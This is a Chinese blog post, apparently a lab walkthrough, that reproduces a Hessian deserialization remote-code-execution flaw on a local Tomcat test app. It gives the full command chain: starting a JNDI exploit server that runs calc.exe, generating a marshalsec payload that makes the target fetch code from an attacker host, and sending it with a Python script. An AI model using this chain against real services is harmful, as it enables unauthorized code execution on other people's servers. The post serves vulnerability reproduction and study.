Hessian反序列化RCE漏洞

Hessian反序列化RCE漏洞

安装java
安装tomcat
部署Hessian
https://raw.githubusercontent.com/21superman/Hessian-Deserialize-RCE/master/HessianTest.war
访问:http://192.168.31.36:8080//HessianTest/hessian

启动JNDI利用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc.exe -A 192.168.31.102

-C为需要执行的命令
-A为监听地址

生成payload

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Resin http://192.168.31.102:8180/ ExecTemplateJDK7>hession

Hessian反序列化RCE漏洞

发送payload到hessian服务器

python hessian.py -u http://192.168.31.36:8080/HessianTest/hessian -p hession

Hessian反序列化RCE漏洞

这里的报错是因为我python环境的问题
这里我踩了一个坑,hessian.py里需要用到一个argparse包,我本机的环境一直出问题,最后更新了pip,更新了argparse包才搞定

命令执行成功

指纹

HTTP发送二进制的数据包 ???
参考:https://www.freebuf.com/vuls/224280.html

相关文章：

2022-12-23
2020-10-06
2021-06-11
2022-01-13
2021-08-19
2021-06-17

猜你喜欢

2021-08-12
2021-07-30
2022-02-17
2021-09-22
2021-11-12
2021-08-26
2022-01-13

相关资源

下载 2022-12-07
下载 2021-07-01
下载 2022-12-28

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode